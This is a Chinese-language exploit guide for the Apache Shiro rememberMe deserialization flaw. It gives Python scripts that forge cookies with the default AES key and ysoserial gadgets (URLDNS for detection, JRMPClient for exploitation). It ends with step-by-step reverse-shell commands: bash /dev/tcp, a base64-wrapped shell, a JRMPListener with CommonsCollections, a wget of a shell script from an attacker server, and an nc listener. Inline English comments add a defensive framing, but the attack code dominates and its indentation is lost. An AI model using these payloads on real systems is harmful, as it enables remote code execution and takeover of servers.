利用burp dns進行檢測,腳本如下:
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
import requests
# copy to clipboard
def encode_rememberme(command):
# Build a rememberMe cookie value from a ysoserial URLDNS chain.
#
# command: the URL handed to ysoserial's URLDNS gadget (the __main__ block
#          passes a Burp Collaborator hostname). Per the page intro this is
#          the detection step: the signal is an out-of-band DNS lookup at
#          the collaborator, not anything in the HTTP response.
# returns: base64 bytes of iv || AES-CBC(key, iv, padded serialized object).
#
# Note: subprocess.Popen does not raise on a failed java invocation; if the
# jar is missing or exits early, popen.stdout.read() returns an empty string
# and a padding-only blob is encrypted and returned without any error.
popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'URLDNS', command], stdout=subprocess.PIPE)
BS = AES.block_size
# PKCS#7 padding: append (BS - len % BS) bytes, each holding that count
# (a full extra block when the input is already block-aligned).
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
# Hard-coded AES key. This value is the well-known default rememberMe key
# shipped in older Apache Shiro releases; the cookie only decrypts on a
# server that still uses it, which is exactly what this check probes for.
# The mitigation on the server side is a per-deployment random key.
key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
# Fresh random IV per payload; it is prefixed to the ciphertext in the clear.
iv = uuid.uuid4().bytes
encryptor = AES.new(key, AES.MODE_CBC, iv)
# read() blocks until the subprocess closes stdout; the process is never wait()ed.
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
# Python 2 script (print statements without parentheses).
# 'xxx.burpcollaborator.net' and 'http://xxx.com' are placeholders in the
# original text, not real endpoints.
payload = encode_rememberme('http://xxx.burpcollaborator.net')
print "rememberMe={0}".format(payload.decode())
target = 'http://xxx.com'
# The crafted value is sent as an ordinary rememberMe cookie. From a
# defender's view the observable is the server's outbound DNS query to the
# collaborator host; r.text is printed only for convenience.
r = requests.get(target,cookies={'rememberMe': payload.decode()},timeout=10)
print r.text
漏洞利用腳本如下:
import os
import re
import base64
import uuid
import subprocess
import requests
import sys
from Crypto.Cipher import AES
def poc(url,rce_command):
# Send a generator() payload to url as the rememberMe cookie.
#
# url:         target, with or without a scheme.
# rce_command: despite the name, this is the host:port string passed to
#              ysoserial's JRMPClient gadget in generator() (see the
#              'x.x.x.x:443' value in the __main__ block), i.e. where the
#              deserializing server will connect out to.
#
# Defender note: the server-side indicators are an outbound JRMP/RMI
# connection from the application host to an unexpected address, and
# rememberMe cookies that are unusually long or fail to decrypt.
#
# Scheme guess for bare hosts: ':443' is a substring test, so it also
# matches ports such as ':4430'; everything else defaults to http.
if '://' not in url:
target = 'https://%s' % url if ':443' in url else 'http://%s' % url
else:
target = url
payload = generator(rce_command)
#
try:
#print "rememberMe={0}".format(payload.decode())
r = requests.get(target,cookies={'rememberMe': payload.decode()},timeout=10)
print r.text
# Python 2 except syntax. Every error (connection refused, timeout,
# decode failure) is swallowed silently, so a non-response here tells the
# caller nothing; the function has no return value.
except Exception, e:
pass
# # return False
def generator(command):
# Build a rememberMe cookie value from a ysoserial JRMPClient chain.
# Near-duplicate of encode_rememberme() in the first script; only the
# gadget name and the place the key is decoded differ.
#
# command: the argument given to the JRMPClient gadget (a host:port string
#          in the __main__ block).
# returns: base64 bytes of iv || AES-CBC(key, iv, padded serialized object).
#
# Note: Popen does not raise on a failed java invocation; an empty stdout
# results in a padding-only blob being encrypted and returned.
popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
BS = AES.block_size
# PKCS#7 padding; a full extra block is added when input is block-aligned.
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
# Hard-coded base64 AES key: the well-known default rememberMe key of older
# Apache Shiro releases. A server with a rotated, deployment-specific key
# will not decrypt this cookie, which is the mitigation this probe tests.
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
# Random IV per payload, transmitted in the clear as the cookie prefix.
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
#print(base64_ciphertext)
return base64_ciphertext
if __name__ == '__main__':
# Both values are placeholders ('x.x.x.x') in the original text.
url = 'http://x.x.x.x:8071'
# cmd is the JRMP listener host:port consumed by generator(), not a shell command.
cmd = 'x.x.x.x:443'
poc(url,cmd)
在你的vps上使用如下payload進行反彈即可
linux反彈命令 bash -i >& /dev/tcp/xxxxxx.x/53 0>&1 base64編碼 bash -c {echo,xxxxxxx}|{base64,-d}|{bash,-i} vps上執行,CommonsCollections也可以使用CommonsCollections2,CommonsCollections4 java -cp ysoserial.jar ysoserial.exploit.JRMPListener 443 CommonsCollections1 'bash -c {echo,xxxxxxx}|{base64,-d}|{bash,-i}' 監聽反彈端口 nc -lvp 53
有時候直接反彈是不成功的。可以先下載然后執行。
/bin/bash -i >& /dev/tcp/*.*.*.*/2019 0>&1 將反彈shell的命令寫成txt然后放在web目錄下 開啟web python -m SimpleHTTPServer 8080 執行下載命令 java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 2020 CommonsCollections1 'wget http://*.*.*.*:8080/1.txt' 執行反彈命令 java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 2020 CommonsCollections1 'sh 1.txt' 監聽反彈端口 nc -lvv 2019
